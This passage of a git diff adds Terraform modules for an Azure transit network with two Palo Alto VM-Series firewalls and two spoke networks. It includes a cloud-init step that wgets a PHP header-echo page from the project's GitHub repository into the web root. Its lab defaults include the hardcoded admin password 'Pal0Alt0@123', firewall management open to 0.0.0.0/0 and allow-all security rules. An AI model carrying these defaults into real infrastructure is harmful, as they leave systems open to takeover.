+variable subnet_id {
+  default = ""
+}
+
+variable frontend_name {
+  default = "LoadBalancerFrontEnd"
+}
+
+variable backend_name {
+  default = "LoadBalancerBackendPool"
+}
+
+variable frontend_ports {
+  type    = list(string)
+  default = [0]
+}
+
+variable backend_ports {
+  type    = list(string)
+  default = [0]
+}
+
+variable protocol {
+  default = "All"
+}
+
+variable probe_name {
+  default = "HealthProbe"
+}
+
+variable probe_ports {
+  type    = list(string)
+  default = [22]
+}
+
+variable type {
+  default = ""
+}
+
+variable rule_name {
+  default = "HA-Ports"
+}
\ No newline at end of file
diff --git a/azure/transit_2fw_2spoke_common/modules/spoke_vm/main.tf b/azure/transit_2fw_2spoke_common/modules/spoke_vm/main.tf
new file mode 100644
index 00000000..dfdfcd8c
--- /dev/null
+++ b/azure/transit_2fw_2spoke_common/modules/spoke_vm/main.tf
@@ -0,0 +1,61 @@
+resource "azurerm_network_security_group" "main" {
+  name                = "${var.name}-nsg"
+  location            = var.location
+  resource_group_name = var.resource_group_name
+}
+
+resource "azurerm_network_interface" "main" {
+  count                     = var.vm_count
+  name                      ="${var.name}${count.index + 1}-nic0"
+  location                  = var.location
+  resource_group_name       = var.resource_group_name
+  network_security_group_id = azurerm_network_security_group.main.id
+
+  ip_configuration {
+    name                          = "ipconfig1"
+    subnet_id                     = var.subnet_id
+    private_ip_address_allocation = "dynamic"
+    load_balancer_backend_address_pools_ids = var.backend_pool_ids
+  }
+}
+
+resource "azurerm_virtual_machine" "main" {
+  count                            = var.vm_count
+  name                             ="${var.name}${count.index + 1}"
+  location                         = var.location
+  resource_group_name              = var.resource_group_name
+  network_interface_ids            = [element(azurerm_network_interface.main.*.id, count.index)]
+  vm_size                          = "Standard_B1s"
+  availability_set_id              = var.availability_set_id
+  delete_os_disk_on_termination    = true
+  delete_data_disks_on_termination = true
+
+  storage_image_reference {
+    publisher = var.publisher
+    offer     = var.offer
+    sku       = var.sku
+    version   = "latest"
+  }
+
+  storage_os_disk {
+    name              = "${var.name}${count.index + 1}"
+    caching           = "ReadWrite"
+    create_option     = "FromImage"
+    managed_disk_type = "Standard_LRS"
+  }
+
+  os_profile {
+    computer_name  = "${var.name}${count.index + 1}"
+    admin_username = var.username
+    admin_password = var.password
+    custom_data    = var.custom_data
+  }
+
+  os_profile_linux_config {
+    disable_password_authentication = false
+  }
+  tags = var.tags
+  depends_on = [
+    azurerm_network_interface.main
+  ]
+}
\ No newline at end of file
diff --git a/azure/transit_2fw_2spoke_common/modules/spoke_vm/outputs.tf b/azure/transit_2fw_2spoke_common/modules/spoke_vm/outputs.tf
new file mode 100644
index 00000000..728812e6
--- /dev/null
+++ b/azure/transit_2fw_2spoke_common/modules/spoke_vm/outputs.tf
@@ -0,0 +1,4 @@
+output network_interface {
+  value = azurerm_network_interface.main.*.id
+}
+
diff --git a/azure/transit_2fw_2spoke_common/modules/spoke_vm/variables.tf b/azure/transit_2fw_2spoke_common/modules/spoke_vm/variables.tf
new file mode 100644
index 00000000..3a8c7cb7
--- /dev/null
+++ b/azure/transit_2fw_2spoke_common/modules/spoke_vm/variables.tf
@@ -0,0 +1,60 @@
+# variable vm_names {
+#   type    = list(string)
+#   default = ["azure-vm"]
+# }
+variable vm_count {
+}
+
+variable name {
+
+}
+
+variable subnet_id {
+}
+
+variable location {
+}
+
+variable resource_group_name {
+}
+
+variable username {
+}
+
+variable password {
+}
+
+variable availability_set_id {
+  default = ""
+}
+
+variable custom_data {
+  default = ""
+}
+
+variable publisher {
+  default = "Canonical"
+}
+
+variable offer {
+  default = "UbuntuServer"
+}
+
+variable sku {
+  default = "16.04-LTS"
+}
+
+variable backend_pool_ids {
+  type = list(string)
+  default = null
+}
+
+variable tags {
+  type = map(string)
+
+  default = {
+    tag1 = ""
+    tag2 = ""
+  }
+}
+
diff --git a/azure/transit_2fw_2spoke_common/modules/spoke_vnet/main.tf b/azure/transit_2fw_2spoke_common/modules/spoke_vnet/main.tf
new file mode 100644
index 00000000..5fccb231
--- /dev/null
+++ b/azure/transit_2fw_2spoke_common/modules/spoke_vnet/main.tf
@@ -0,0 +1,71 @@
+#-----------------------------------------------------------------------------------------------------------------
+# Create spoke VNET
+resource "azurerm_virtual_network" "main" {
+  name                = var.name
+  location            = var.location
+  address_space       = [var.address_space]
+  resource_group_name = var.resource_group_name
+  dns_servers         = var.dns_servers
+  tags                = var.tags
+}
+
+resource "azurerm_subnet" "main" {
+  count                = length(var.subnet_prefixes)
+  name                 = "${var.name}-subnet${count.index}"
+  virtual_network_name = azurerm_virtual_network.main.name
+  resource_group_name  = var.resource_group_name
+  address_prefix       = var.subnet_prefixes[count.index]
+}
+
+#-----------------------------------------------------------------------------------------------------------------
+# Create peering link between new spoke VNET and transit VNET
+resource "azurerm_virtual_network_peering" "spoke-to-hub" {
+  name                         = "${var.name}-to-${var.remote_vnet_name}"
+  resource_group_name          = var.resource_group_name
+  virtual_network_name         = azurerm_virtual_network.main.name
+  remote_virtual_network_id    = var.remote_vnet_id
+  allow_virtual_network_access = true
+  allow_forwarded_traffic      = true
+  allow_gateway_transit        = false
+  use_remote_gateways          = false
+}
+
+resource "azurerm_virtual_network_peering" "hub-to-spoke" {
+  name                         = "${var.remote_vnet_name}-to-${var.name}"
+  resource_group_name          = var.remote_vnet_rg
+  virtual_network_name         = var.remote_vnet_name
+  remote_virtual_network_id    = azurerm_virtual_network.main.id
+  allow_virtual_network_access = true
+  allow_forwarded_traffic      = true
+  allow_gateway_transit        = false
+  use_remote_gateways          = false
+}
+
+#-----------------------------------------------------------------------------------------------------------------
+# Create route table for subnets with default route to transit virtual appliance
+resource "azurerm_route_table" "main" {
+  name                = "${var.name}-route-table"
+  location            = var.location
+  resource_group_name = var.resource_group_name
+}
+
+resource "azurerm_route" "main" {
+  count                  = length(var.route_table_destinations)
+  name                   = "udr-${count.index}"
+  resource_group_name    = var.resource_group_name
+  route_table_name       = azurerm_route_table.main.name
+  address_prefix         = element(var.route_table_destinations, count.index)
+  next_hop_type          = "VirtualAppliance"
+  next_hop_in_ip_address = element(var.route_table_next_hop, count.index)
+}
+
+resource "azurerm_subnet_route_table_association" "main" {
+  count          = length(var.subnet_prefixes)
+  subnet_id      = element(azurerm_subnet.main.*.id, count.index)
+  route_table_id = azurerm_route_table.main.id
+  depends_on = [
+    azurerm_route_table.main,
+    azurerm_subnet.main,
+  ]
+}
+
diff --git a/azure/transit_2fw_2spoke_common/modules/spoke_vnet/outputs.tf b/azure/transit_2fw_2spoke_common/modules/spoke_vnet/outputs.tf
new file mode 100644
index 00000000..82296b21
--- /dev/null
+++ b/azure/transit_2fw_2spoke_common/modules/spoke_vnet/outputs.tf
@@ -0,0 +1,24 @@
+output vnet_id {
+  description = "The id of the newly created vNet"
+  value       = azurerm_virtual_network.main.id
+}
+
+output vnet_name {
+  description = "The Name of the newly created vNet"
+  value       = azurerm_virtual_network.main.name
+}
+
+output vnet_location {
+  description = "The location of the newly created vNet"
+  value       = azurerm_virtual_network.main.location
+}
+
+output vnet_address_space {
+  description = "The address space of the newly created vNet"
+  value       = azurerm_virtual_network.main.address_space
+}
+
+output vnet_subnets {
+  description = "The ids of subnets created inside the newl vNet"
+  value       = azurerm_subnet.main.*.id
+}
diff --git a/azure/transit_2fw_2spoke_common/modules/spoke_vnet/variables.tf b/azure/transit_2fw_2spoke_common/modules/spoke_vnet/variables.tf
new file mode 100644
index 00000000..57aa4bd9
--- /dev/null
+++ b/azure/transit_2fw_2spoke_common/modules/spoke_vnet/variables.tf
@@ -0,0 +1,59 @@
+variable name {
+  description = "Name of the vnet to create"
+  default     = "vnet"
+}
+
+variable resource_group_name {
+  description = "Default resource group name that the network will be created in."
+  default     = "myapp-rg"
+}
+
+variable location {
+  description = "The location/region where the core network will be created. The full list of Azure regions can be found at https://azure.microsoft.com/regions"
+  default     = "westus"
+}
+
+variable address_space {
+  description = "The address space that is used by the virtual network."
+  default     = "10.0.0.0/16"
+}
+
+# If no values specified, this defaults to Azure DNS 
+variable dns_servers {
+  description = "The DNS servers to be used with vNet."
+  default     = []
+}
+
+variable subnet_prefixes {
+  description = "The address prefix to use for the subnet."
+  default     = ["10.0.1.0/24"]
+}
+
+variable tags {
+  description = "The tags to associate with your network and subnets."
+  type        = map(string)
+
+  default = {
+    tag1 = ""
+    tag2 = ""
+  }
+}
+
+variable remote_vnet_name {
+}
+
+variable remote_vnet_rg {
+}
+
+variable remote_vnet_id {
+}
+
+variable route_table_destinations {
+  type    = list(string)
+  default = ["0.0.0.0/0"]
+}
+
+variable route_table_next_hop {
+  type = list(string)
+}
+
diff --git a/azure/transit_2fw_2spoke_common/modules/vmseries/main.tf b/azure/transit_2fw_2spoke_common/modules/vmseries/main.tf
new file mode 100644
index 00000000..f017be2b
--- /dev/null
+++ b/azure/transit_2fw_2spoke_common/modules/vmseries/main.tf
@@ -0,0 +1,207 @@
+resource "null_resource" "dependency_getter" {
+  provisioner "local-exec" {
+    command = "echo ${length(var.dependencies)}"
+  }
+}
+
+#-----------------------------------------------------------------------------------------------------------------
+# Create NSGs for firewall dataplane interfaces (required for Standard SKU LB)
+resource "azurerm_network_security_group" "mgmt" {
+  name                = "${var.name}-nsg-mgmt"
+  location            = var.location
+  resource_group_name = var.resource_group_name
+
+  security_rule {
+    name                       = "mgmt-inbound"
+    priority                   = 1000
+    direction                  = "Inbound"
+    access                     = "Allow"
+    protocol                   = "Tcp"
+    source_port_range          = "*"
+    destination_port_ranges    = ["443", "22"]
+    source_address_prefix      = var.nsg_prefix
+    destination_address_prefix = "*"
+  }
+}
+
+resource "azurerm_network_security_group" "data" {
+  name                = "${var.name}-nsg-data"
+  location            = var.location
+  resource_group_name = var.resource_group_name
+
+  security_rule {
+    name                       = "data-inbound"
+    priority                   = 1000
+    direction                  = "Inbound"
+    access                     = "Allow"
+    protocol                   = "*"
+    source_port_range          = "*"
+    destination_port_range     = "*"
+    source_address_prefix      = "*"
+    destination_address_prefix = "*"
+  }
+
+  security_rule {
+    name                       = "data-outbound"
+    priority                   = 1000
+    direction                  = "Outbound"
+    access                     = "Allow"
+    protocol                   = "*"
+    source_port_range          = "*"
+    destination_port_range     = "*"
+    source_address_prefix      = "*"
+    destination_address_prefix = "*"
+  }
+}
+
+#-----------------------------------------------------------------------------------------------------------------
+# Create public IPs for firewall's management & dataplane1 interface
+resource "azurerm_public_ip" "nic0" {
+  count               = var.nic0_public_ip ? var.vm_count : 0
+  name                = "${var.name}${count.index + 1}-nic0-pip"
+  location            = var.location
+  resource_group_name = var.resource_group_name
+  allocation_method   = var.public_ip_address_allocation
+  sku                 = var.sku
+}
+
+resource "azurerm_public_ip" "nic1" {
+  count               = var.nic1_public_ip ? var.vm_count : 0
+  name                = "${var.name}${count.index + 1}-nic1-pip"
+  location            = var.location
+  resource_group_name = var.resource_group_name
+  allocation_method   = var.public_ip_address_allocation
+  sku                 = var.sku
+}
+
+resource "azurerm_public_ip" "nic2" {
+  count               = var.nic2_public_ip ? var.vm_count : 0
+  name                = "${var.name}${count.index + 1}-nic2-pip"
+  location            = var.location
+  resource_group_name = var.resource_group_name
+  allocation_method   = var.public_ip_address_allocation
+  sku                 = var.sku
+}
+
+#-----------------------------------------------------------------------------------------------------------------
+# Create firewall interfaces (mgmt, data1, data2).  Dynamic interface is created first, then IP is set statically.
+
+resource "azurerm_network_interface" "nic0" {
+  count                     = var.vm_count
+  name                      = "${var.name}${count.index + 1}-nic0"
+  location                  = var.location
+  resource_group_name       = var.resource_group_name
+  network_security_group_id = azurerm_network_security_group.mgmt.id
+
+  ip_configuration {
+    name                          = "ipconfig1"
+    subnet_id                     = var.subnet_mgmt
+    private_ip_address_allocation = "Dynamic"
+    public_ip_address_id          = var.nic0_public_ip ? element(concat(azurerm_public_ip.nic0.*.id, list("")), count.index) : ""
+
+  }
+}
+
+resource "azurerm_network_interface" "nic1" {
+  count                     = var.vm_count
+  name                      = "${var.name}${count.index + 1}-nic1"
+  location                  = var.location
+  resource_group_name       = var.resource_group_name
+  network_security_group_id = azurerm_network_security_group.data.id
+  enable_ip_forwarding      = true
+  
+  ip_configuration {
+    name                          = "ipconfig1"
+    subnet_id                     = var.subnet_untrust
+    private_ip_address_allocation = "Dynamic"
+    public_ip_address_id          = var.nic1_public_ip ? element(concat(azurerm_public_ip.nic1.*.id, list("")), count.index) : ""
+    load_balancer_backend_address_pools_ids = var.nic1_backend_pool_ids
+  }
+}
+
+resource "azurerm_network_interface" "nic2" {
+  count                     = var.vm_count
+  name                      = "${var.name}${count.index + 1}-nic2"
+  location                  = var.location
+  resource_group_name       = var.resource_group_name
+  network_security_group_id = azurerm_network_security_group.data.id
+  enable_ip_forwarding      = true
+
+  ip_configuration {
+    name                          = "ipconfig1"
+    subnet_id                     = var.subnet_trust
+    private_ip_address_allocation = "Dynamic"
+    public_ip_address_id          = var.nic2_public_ip ? element(concat(azurerm_public_ip.nic2.*.id, list("")), count.index) : ""
+    load_balancer_backend_address_pools_ids = var.nic2_backend_pool_ids
+  }
+}
+
+#-----------------------------------------------------------------------------------------------------------------
+# Create VM-Series NGFWs
+resource "azurerm_availability_set" "default" {
+  name                        = var.avset_name
+  location                    = var.location
+  platform_fault_domain_count = var.avset_fault_domain_count
+  resource_group_name         = var.resource_group_name
+  managed                     = true
+}
+
+resource "azurerm_virtual_machine" "vmseries" {
+  count                        = var.vm_count
+  name                         = "${var.name}${count.index + 1}"
+  location                     = var.location
+  resource_group_name          = var.resource_group_name
+  vm_size                      = var.size
+  primary_network_interface_id = element(azurerm_network_interface.nic0.*.id, count.index)
+
+  network_interface_ids = [
+    element(azurerm_network_interface.nic0.*.id, count.index),
+    element(azurerm_network_interface.nic1.*.id, count.index),
+    element(azurerm_network_interface.nic2.*.id, count.index),
+  ]
+
+  availability_set_id = azurerm_availability_set.default.id
+
+  os_profile_linux_config {
+    disable_password_authentication = false
+  }
+
+  plan {
+    name      = var.license
+    publisher = "paloaltonetworks"
+    product   = "vmseries1"
+  }
+
+  storage_image_reference {
+    publisher = "paloaltonetworks"
+    offer     = "vmseries1"
+    sku       = var.license
+    version   = var.panos
+  }
+
+  storage_os_disk {
+    name              = "${var.name}${count.index + 1}-osdisk"
+    caching           = "ReadWrite"
+    create_option     = "FromImage"
+    managed_disk_type = "Standard_LRS"
+  }
+
+  os_profile {
+    computer_name  = "${var.name}${count.index + 1}"
+    admin_username = var.username
+    admin_password = var.password
+    custom_data = join(
+      ",",
+      [
+        "storage-account=${var.bootstrap_storage_account}",
+        "access-key=${var.bootstrap_access_key}",
+        "file-share=${var.bootstrap_file_share}",
+        "share-directory=${var.bootstrap_share_directory}",
+      ],
+    )
+  }
+  depends_on = [
+    null_resource.dependency_getter
+  ]
+}
+
diff --git a/azure/transit_2fw_2spoke_common/modules/vmseries/outputs.tf b/azure/transit_2fw_2spoke_common/modules/vmseries/outputs.tf
new file mode 100644
index 00000000..accfe421
--- /dev/null
+++ b/azure/transit_2fw_2spoke_common/modules/vmseries/outputs.tf
@@ -0,0 +1,20 @@
+output nic0_id {
+  value = azurerm_network_interface.nic0.*.id
+}
+
+output nic1_id {
+  value = azurerm_network_interface.nic1.*.id
+}
+
+output nic2_id {
+  value = azurerm_network_interface.nic2.*.id
+}
+
+output nic1_public_ip {
+  value = azurerm_public_ip.nic1.*.ip_address
+}
+
+output nic0_public_ip {
+  value = azurerm_public_ip.nic0.*.ip_address
+}
+
diff --git a/azure/transit_2fw_2spoke_common/modules/vmseries/variables.tf b/azure/transit_2fw_2spoke_common/modules/vmseries/variables.tf
new file mode 100644
index 00000000..c3f9ac36
--- /dev/null
+++ b/azure/transit_2fw_2spoke_common/modules/vmseries/variables.tf
@@ -0,0 +1,103 @@
+variable location {
+}
+
+variable resource_group_name {
+}
+
+variable subnet_mgmt {
+}
+
+variable subnet_untrust {
+}
+
+variable subnet_trust {
+}
+
+variable avset_name {
+}
+
+variable avset_fault_domain_count {
+  default = 2
+}
+
+
+variable panos {
+}
+
+variable license {
+}
+
+variable username {
+}
+
+variable password {
+}
+
+variable name {
+  default = "vmseries"
+}
+
+variable nsg_prefix {
+  description = "Enter a valid address prefix.  This address prefix will be able to access the firewalls mgmt interface over TCP/443 and TCP/22"
+  default     = "0.0.0.0/0"
+}
+
+variable vm_count {
+}
+
+variable size {
+  default = "Standard_DS3_v2"
+}
+
+variable sku {
+  default = "Standard"
+}
+
+variable public_ip_address_allocation {
+  default = "Static"
+}
+
+variable bootstrap_storage_account {
+  default = ""
+}
+
+variable bootstrap_access_key {
+  default = ""
+}
+
+variable bootstrap_file_share {
+  default = ""
+}
+
+variable bootstrap_share_directory {
+  default = "None"
+}
+
+variable nic0_public_ip {
+  type = bool
+  default = false
+}
+
+variable nic1_public_ip {
+  type = bool
+  default = false
+}
+
+variable nic2_public_ip {
+  default = null
+}
+
+variable nic1_backend_pool_ids {
+  type = list(string)
+  default = null
+}
+
+variable nic2_backend_pool_ids {
+  type = list(string)
+  default = null
+}
+
+variable dependencies {
+  type    = list(string)
+  default = []
+}
diff --git a/azure/transit_2fw_2spoke_common/modules/vnet/main.tf b/azure/transit_2fw_2spoke_common/modules/vnet/main.tf
new file mode 100644
index 00000000..a11608f8
--- /dev/null
+++ b/azure/transit_2fw_2spoke_common/modules/vnet/main.tf
@@ -0,0 +1,17 @@
+resource "azurerm_virtual_network" "vnet" {
+  name                = var.name
+  location            = var.location
+  address_space       = [var.address_space]
+  resource_group_name = var.resource_group_name
+  dns_servers         = var.dns_servers
+  tags                = var.tags
+}
+
+resource "azurerm_subnet" "subnet" {
+  name                      = element(var.subnet_names, count.index)
+  virtual_network_name      = azurerm_virtual_network.vnet.name
+  resource_group_name       = var.resource_group_name
+  address_prefix            = element(var.subnet_prefixes, count.index)
+ # network_security_group_id = lookup(var.nsg_ids, var.subnet_names[count.index], "")
+  count                     = length(var.subnet_names)
+}
diff --git a/azure/transit_2fw_2spoke_common/modules/vnet/outputs.tf b/azure/transit_2fw_2spoke_common/modules/vnet/outputs.tf
new file mode 100644
index 00000000..fedfbf16
--- /dev/null
+++ b/azure/transit_2fw_2spoke_common/modules/vnet/outputs.tf
@@ -0,0 +1,25 @@
+output vnet_id {
+  description = "The id of the newly created vNet"
+  value       = azurerm_virtual_network.vnet.id
+}
+
+output vnet_name {
+  description = "The Name of the newly created vNet"
+  value       = azurerm_virtual_network.vnet.name
+}
+
+output vnet_location {
+  description = "The location of the newly created vNet"
+  value       = azurerm_virtual_network.vnet.location
+}
+
+output vnet_address_space {
+  description = "The address space of the newly created vNet"
+  value       = azurerm_virtual_network.vnet.address_space
+}
+
+output vnet_subnets {
+  description = "The ids of subnets created inside the newl vNet"
+  value       = azurerm_subnet.subnet.*.id
+}
+
diff --git a/azure/transit_2fw_2spoke_common/modules/vnet/variables.tf b/azure/transit_2fw_2spoke_common/modules/vnet/variables.tf
new file mode 100644
index 00000000..348e3c13
--- /dev/null
+++ b/azure/transit_2fw_2spoke_common/modules/vnet/variables.tf
@@ -0,0 +1,58 @@
+variable name {
+  description = "Name of the vnet to create"
+  default     = "vnet"
+}
+
+variable resource_group_name {
+  description = "Default resource group name that the network will be created in."
+  default     = "myapp-rg"
+}
+
+variable location {
+  description = "The location/region where the core network will be created. The full list of Azure regions can be found at https://azure.microsoft.com/regions"
+  default     = "westus"
+}
+
+variable address_space {
+  description = "The address space that is used by the virtual network."
+  default     = "10.0.0.0/16"
+}
+
+# If no values specified, this defaults to Azure DNS 
+variable dns_servers {
+  description = "The DNS servers to be used with vNet."
+  default     = []
+}
+
+variable subnet_prefixes {
+  description = "The address prefix to use for the subnet."
+  default     = ["10.0.1.0/24"]
+  type        = list(string)
+}
+
+variable subnet_names {
+  description = "A list of public subnets inside the vNet."
+  type        = list(string)
+  default     = ["subnet1", "subnet2", "subnet3"]
+}
+
+variable nsg_ids {
+  description = "A map of subnet name to Network Security Group IDs"
+  type        = map(string)
+
+  default = {
+    subnet1 = "nsgid1"
+    subnet3 = "nsgid3"
+  }
+}
+
+variable tags {
+  description = "The tags to associate with your network and subnets."
+  type        = map(string)
+
+  default = {
+    tag1 = ""
+    tag2 = ""
+  }
+}
+
diff --git a/azure/transit_2fw_2spoke_common/providers.tf b/azure/transit_2fw_2spoke_common/providers.tf
new file mode 100644
index 00000000..73e1aae5
--- /dev/null
+++ b/azure/transit_2fw_2spoke_common/providers.tf
@@ -0,0 +1,11 @@
+terraform {
+  required_version = ">= 0.12"
+}
+
+provider "azurerm" {
+  version         = "= 1.41"
+  #subscription_id = var.subscription_id
+  #client_id       = var.client_id
+  #client_secret   = var.client_secret
+  #tenant_id       = var.tenant_id
+}
\ No newline at end of file
diff --git a/azure/transit_2fw_2spoke_common/scripts/showheaders.php b/azure/transit_2fw_2spoke_common/scripts/showheaders.php
new file mode 100644
index 00000000..19c37318
--- /dev/null
+++ b/azure/transit_2fw_2spoke_common/scripts/showheaders.php
@@ -0,0 +1,62 @@
+<?php
+function microtime_float()
+{
+    list($usec, $sec) = explode(" ", microtime());
+    return ((float)$usec + (float)$sec);
+}
+
+$time_start = microtime_float();
+
+// Sleep for a while
+usleep(100);
+
+$time_end = microtime_float();
+$time = $time_end - $time_start;
+function getRealIpAddr()
+{
+    if (!empty($_SERVER['HTTP_CLIENT_IP']))   //check ip from share internet
+    {
+      $ip=$_SERVER['HTTP_CLIENT_IP'];
+    }
+    elseif (!empty($_SERVER['HTTP_X_FORWARDED_FOR']))   //to check ip is pass from proxy
+    {
+      $ip=$_SERVER['HTTP_X_FORWARDED_FOR'];
+    }
+    else
+    {
+      $ip=$_SERVER['REMOTE_ADDR'];
+    }
+    return $ip;
+}
+echo '<b style="color: red">
+      SOURCE & DESTINATION ADDRESSES
+      </b></br> ';
+echo '<strong>'. "INTERVAL" .'</strong>: '. $time .'<br />';
+$localIPAddress = getHostByName(getHostName());
+$sourceIPAddress = getRealIpAddr();
+echo '<strong>'. "SOURCE IP" .'</strong>: '. $sourceIPAddress .'<br />';
+echo '<strong>'. "LOCAL  IP" .'</strong>: '. $localIPAddress .'<br />';
+
+$vm_name = gethostname();
+echo '<strong>'. "VM NAME" .'</strong>: '. $vm_name .'<br />';
+echo ''. '<br />';
+echo '<b style="color: blue">
+      HEADER INFORMATION
+      </b></br> ';
+/* All $_SERVER variables prefixed with HTTP_ are the HTTP headers */
+foreach ($_SERVER as $header => $value) {
+  if (substr($header, 0, 5) == 'HTTP_') {
+    /* Strip the HTTP_ prefix from the $_SERVER variable, what remains is the header */
+    $clean_header = strtolower(substr($header, 5, strlen($header)));
+
+    /* Replace underscores by the dashes, as the browser sends them */
+    $clean_header = str_replace('_', '-', $clean_header);
+
+    /* Cleanup: standard headers are first-letter uppercase */
+    $clean_header = ucwords($clean_header, " \t\r\n\f\v-");
+
+    /* And show'm */
+    echo '<strong>'. $header .'</strong>: '. $value .'<br />';
+  }
+}
+?>
diff --git a/azure/transit_2fw_2spoke_common/scripts/web_startup.yml.tpl b/azure/transit_2fw_2spoke_common/scripts/web_startup.yml.tpl
new file mode 100644
index 00000000..1d02e945
--- /dev/null
+++ b/azure/transit_2fw_2spoke_common/scripts/web_startup.yml.tpl
@@ -0,0 +1,10 @@
+#cloud-config
+
+runcmd:
+  - sudo apt-get update -y
+  - sudo apt-get install -y php
+  - sudo apt-get install -y apache2
+  - sudo apt-get install -y libapache2-mod-php
+  - sudo rm -f /var/www/html/index.html
+  - sudo wget -O /var/www/html/index.php https://raw.githubusercontent.com/wwce/terraform/master/azure/transit_2fw_2spoke_common/scripts/showheaders.php
+  - sudo systemctl restart apache2
\ No newline at end of file
diff --git a/azure/transit_2fw_2spoke_common/spokes.tf b/azure/transit_2fw_2spoke_common/spokes.tf
new file mode 100644
index 00000000..ea6ab06c
--- /dev/null
+++ b/azure/transit_2fw_2spoke_common/spokes.tf
@@ -0,0 +1,97 @@
+#-----------------------------------------------------------------------------------------------------------------
+# Create spoke1 resource group, spoke1 VNET, spoke1 internal LB, (2) spoke1 VMs 
+
+resource "azurerm_resource_group" "spoke1_rg" {
+  name     = "${var.global_prefix}${var.spoke1_prefix}-rg"
+  location = var.location
+}
+
+module "spoke1_vnet" {
+  source                      = "./modules/spoke_vnet/"
+  name                        = "${var.spoke1_prefix}-vnet"
+  address_space               = var.spoke1_vnet_cidr
+  subnet_prefixes             = var.spoke1_subnet_cidrs
+  remote_vnet_rg              = azurerm_resource_group.transit.name
+  remote_vnet_name            = module.vnet.vnet_name
+  remote_vnet_id              = module.vnet.vnet_id
+  route_table_destinations    = var.spoke_udrs
+  route_table_next_hop        = [var.fw_internal_lb_ip]
+  location                    = var.location
+  resource_group_name         = azurerm_resource_group.spoke1_rg.name
+}
+
+data "template_file" "web_startup" {
+  template = "${file("${path.module}/scripts/web_startup.yml.tpl")}"
+}
+
+module "spoke1_vm" { 
+  source              = "./modules/spoke_vm/"
+  name                = "${var.spoke1_prefix}-vm"
+  vm_count            = var.spoke1_vm_count
+  subnet_id           = module.spoke1_vnet.vnet_subnets[0]
+  availability_set_id = ""
+  backend_pool_ids    = [module.spoke1_lb.backend_pool_id]
+  custom_data         = base64encode(data.template_file.web_startup.rendered)
+  publisher           = "Canonical"
+  offer               = "UbuntuServer"
+  sku                 = "16.04-LTS"
+  username            = var.spoke_username
+  password            = var.spoke_password
+  tags                = var.tags
+  location            = var.location
+  resource_group_name = azurerm_resource_group.spoke1_rg.name
+}
+
+module "spoke1_lb" {
+  source                  = "./modules/lb/"
+  name                    = "${var.spoke1_prefix}-lb"
+  type                    = "private"
+  sku                     = "Standard"
+  probe_ports             = [80]
+  frontend_ports          = [80]
+  backend_ports           = [80]
+  protocol                = "Tcp"
+  enable_floating_ip      = false
+  subnet_id               = module.spoke1_vnet.vnet_subnets[0]
+  private_ip_address      = var.spoke1_internal_lb_ip
+  location                = var.location
+  resource_group_name     = azurerm_resource_group.spoke1_rg.name
+}
+
+#-----------------------------------------------------------------------------------------------------------------
+# Create spoke2 resource group, spoke2 VNET, spoke2 VM 
+
+resource "azurerm_resource_group" "spoke2_rg" {
+  name     = "${var.global_prefix}${var.spoke2_prefix}-rg"
+  location = var.location
+}
+
+module "spoke2_vnet" {
+  source                      = "./modules/spoke_vnet/"
+  name                   = "${var.spoke2_prefix}-vnet"
+  address_space               = var.spoke2_vnet_cidr
+  subnet_prefixes             = var.spoke2_subnet_cidrs
+  remote_vnet_rg              = azurerm_resource_group.transit.name
+  remote_vnet_name            = module.vnet.vnet_name
+  remote_vnet_id              = module.vnet.vnet_id
+  route_table_destinations    = var.spoke_udrs
+  route_table_next_hop        = [var.fw_internal_lb_ip]
+  location                    = var.location
+  resource_group_name         = azurerm_resource_group.spoke2_rg.name
+}
+
+module "spoke2_vm" {
+  source              = "./modules/spoke_vm/"
+  name                = "${var.spoke2_prefix}-vm"
+  vm_count            = var.spoke2_vm_count
+  subnet_id           = module.spoke2_vnet.vnet_subnets[0]
+  availability_set_id = ""
+  publisher           = "Canonical"
+  offer               = "UbuntuServer"
+  sku                 = "16.04-LTS"
+  username            = var.spoke_username
+  password            = var.spoke_password
+  tags                = var.tags
+  location            = var.location
+  resource_group_name = azurerm_resource_group.spoke2_rg.name
+}
\ No newline at end of file
diff --git a/azure/transit_2fw_2spoke_common/terraform.tfvars b/azure/transit_2fw_2spoke_common/terraform.tfvars
new file mode 100644
index 00000000..2f122c28
--- /dev/null
+++ b/azure/transit_2fw_2spoke_common/terraform.tfvars
@@ -0,0 +1,43 @@
+#fw_license   = "byol"                                                       # Uncomment 1 fw_license to select VM-Series licensing mode
+#fw_license   = "bundle1"
+#fw_license   = "bundle2"
+
+global_prefix = ""                                                           # Prefix to add to all resource groups created.  This is useful to create unique resource groups within a shared Azure subscription
+location      = "eastus"
+
+# -----------------------------------------------------------------------
+# VM-Series resource group variables
+
+fw_prefix               = "vmseries"                                         # Adds prefix name to all resources created in the firewall resource group
+fw_count                = 2
+fw_panos                = "9.0.1"
+fw_nsg_prefix           = "0.0.0.0/0"
+fw_username             = "paloalto"
+fw_password             = "Pal0Alt0@123"
+fw_internal_lb_ip       = "10.0.2.100"
+
+# -----------------------------------------------------------------------
+# Transit resource group variables
+
+transit_prefix          = "transit"                                         # Adds prefix name to all resources created in the transit vnet's resource group
+transit_vnet_cidr       = "10.0.0.0/16"
+transit_subnet_names    = ["mgmt", "untrust", "trust"]
+transit_subnet_cidrs    = ["10.0.0.0/24", "10.0.1.0/24", "10.0.2.0/24"]
+
+# -----------------------------------------------------------------------
+# Spoke resource group variables
+
+spoke1_prefix           = "spoke1"                                          # Adds prefix name to all resources created in spoke1's resource group
+spoke1_vm_count         = 2
+spoke1_vnet_cidr        = "10.1.0.0/16"
+spoke1_subnet_cidrs     = ["10.1.0.0/24"]
+spoke1_internal_lb_ip   = "10.1.0.100"
+
+spoke2_prefix           = "spoke2"                                          # Adds prefix name to all resources created in spoke2's resource group
+spoke2_vm_count         = 1
+spoke2_vnet_cidr        = "10.2.0.0/16"
+spoke2_subnet_cidrs     = ["10.2.0.0/24"]
+
+spoke_username          = "paloalto"
+spoke_password          = "Pal0Alt0@123"
+spoke_udrs              = ["0.0.0.0/0", "10.1.0.0/16", "10.2.0.0/16"]
\ No newline at end of file
diff --git a/azure/transit_2fw_2spoke_common/variables.tf b/azure/transit_2fw_2spoke_common/variables.tf
new file mode 100644
index 00000000..4899c169
--- /dev/null
+++ b/azure/transit_2fw_2spoke_common/variables.tf
@@ -0,0 +1,129 @@
+variable location {
+  description = "Enter a location"
+}
+
+variable fw_prefix {
+  description = "Prefix to add to all resources added in the firewall resource group"
+  default     = ""
+}
+
+variable fw_license {
+  description = "VM-Series license: byol, bundle1, or bundle2"
+  # default = "byol"   
+  # default = "bundle1"  
+  # default = "bundle2"
+}
+
+variable global_prefix {
